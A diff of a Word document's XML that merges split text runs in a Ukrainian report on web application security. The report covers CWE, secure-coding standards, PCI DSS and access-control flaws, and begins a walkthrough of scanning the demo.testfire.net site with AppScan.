-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>п</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ідтримкою яких займаються регулятори різних країн. Наприклад, в США використовується база CWE - Common Weakness Enumeration, обслуговуванням якої займається організація MITRE, підтримувана в тому числі Міністерством оборони США. Вимоги стандартів і рекомендації по захищеному програмування - існує як ряд державних і галузевих стандартів, що описують вимоги до безпечної розробці свпріложеній, так і ряд рекомендацій і «кращих практик» від світових експертів </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>в</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> області розробки і захисту програмного забезпечення. </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Дані документи безпосередньо не описують помилки програмування, на відміну від CWE, але містять перелік методів, які можуть бути перетворені для використання в статичному аналізаторі вихідного коду.</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Від того, які бази використовуються в аналізаторі, безпосередньо залежить якість проведення аналізу, кількість помилкових спрацьовувань і пропущених помилок. </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Кр</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>ім того, аналіз на відповідність вимогам регуляторів дозволяє полегшити і спростити процедуру зовнішнього аудиту інфраструктури та інформаційної системи в тому випадку, якщо вимоги є обов'язковими. Наприклад, вимоги PCI DSS обов'язкові для веб-додатків і вбудованого коду, що працює з платіжною інформацією по банківських картах, при цьому проведення зовнішнього аудиту з виконання PCI DSS здійснюється в тому числі з аналізом застосовуваних програмних продукті</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>в</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>Державні бази помилок програмування - існує ряд державних баз вразливостей, складанням і підтримкою яких займаються регулятори різних країн. Наприклад, в США використовується база CWE - Common Weakness Enumeration, обслуговуванням якої займається організація MITRE, підтримувана в тому числі Міністерством оборони США. Вимоги стандартів і рекомендації по захищеному програмування - існує як ряд державних і галузевих стандартів, що описують вимоги до безпечної розробці свпріложеній, так і ряд рекомендацій і «кращих практик» від світових експертів в області розробки і захисту програмного забезпечення. Дані документи безпосередньо не описують помилки програмування, на відміну від CWE, але містять перелік методів, які можуть бути перетворені для використання в статичному аналізаторі вихідного коду. Від того, які бази використовуються в аналізаторі, безпосередньо залежить якість проведення аналізу, кількість помилкових спрацьовувань і пропущених помилок. Крім того, аналіз на відповідність вимогам регуляторів дозволяє полегшити і спростити процедуру зовнішнього аудиту інфраструктури та інформаційної системи в тому випадку, якщо вимоги є обов'язковими. Наприклад, вимоги PCI DSS обов'язкові для веб-додатків і вбудованого коду, що працює з платіжною інформацією по банківських картах, при цьому проведення зовнішнього аудиту з виконання PCI DSS здійснюється в тому числі з аналізом застосовуваних програмних продуктів.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25335,7 +23006,6 @@
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -25344,18 +23014,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>П</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>ідтримка</w:t>
+        <w:t>Підтримка</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -25455,59 +23114,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>містить</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> перелік вразливостей, відсортованих за ступенем їх небезпеки (на першому місці найнебезпечніший тип вразливостей). Список не включає в себе всі можливі типи вразливостей, </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>кр</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>ім того, часто буває, що ту чи іншу вразливість можна віднести відразу до декількох категорій.</w:t>
+        <w:t xml:space="preserve"> містить перелік вразливостей, відсортованих за ступенем їх небезпеки (на першому місці найнебезпечніший тип вразливостей). Список не включає в себе всі можливі типи вразливостей, крім того, часто буває, що ту чи іншу вразливість можна віднести відразу до декількох категорій.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -26493,31 +24100,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve">7. Відсутність контролю доступу до функціонального </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>р</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>івня</w:t>
+        <w:t>7. Відсутність контролю доступу до функціонального рівня</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -26565,55 +24148,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve">-додатком, можуть мати </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>р</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ізні рівні повноважень. У </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>таких</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> випадках базова аутентифікація може не впоратися з тим, щоб не допустити використання користувачами повноважень, функцій і даних, доступ до яких їм заборонено.</w:t>
+        <w:t>-додатком, можуть мати різні рівні повноважень. У таких випадках базова аутентифікація може не впоратися з тим, щоб не допустити використання користувачами повноважень, функцій і даних, доступ до яких їм заборонено.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -26661,31 +24196,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>обл</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>іковий запис з недостатніми привілеями, може спробувати отримати доступ до закритих функціями (і даними), підбираючи виклики до них.</w:t>
+        <w:t xml:space="preserve"> обліковий запис з недостатніми привілеями, може спробувати отримати доступ до закритих функціями (і даними), підбираючи виклики до них.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27170,8 +24681,6 @@
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -29329,7 +26838,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -29339,6 +26847,1056 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Спочатку необхідно ввести адресу сайту, який буде тестуватися на наявність вразливостей та перевірити наявність з</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>’эднання з сервером.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Для прикладу було викоористано </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>веб-додаток</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> HYPERLINK "</w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:instrText>http</w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:instrText>s</w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:instrText>://demo.testfire.net</w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:color w:val="2A2A2A"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E54D54B" wp14:editId="57876880">
+            <wp:extent cx="5940425" cy="3581790"/>
+            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
+            <wp:docPr id="18" name="Рисунок 18"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5940425" cy="3581790"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve">" </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="a7"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>http</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="a7"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="a7"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>://demo.testfire.net</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="a7"/>
+          <w:noProof/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04B8050E" wp14:editId="22A69519">
+            <wp:extent cx="5940425" cy="3581790"/>
+            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
+            <wp:docPr id="8" name="Рисунок 8"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5940425" cy="3581790"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Далі необхідно авторизуватись у веб-додатку, що тестується. Для цього в комплекті з </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>AppScan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> э стандартний браузер:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
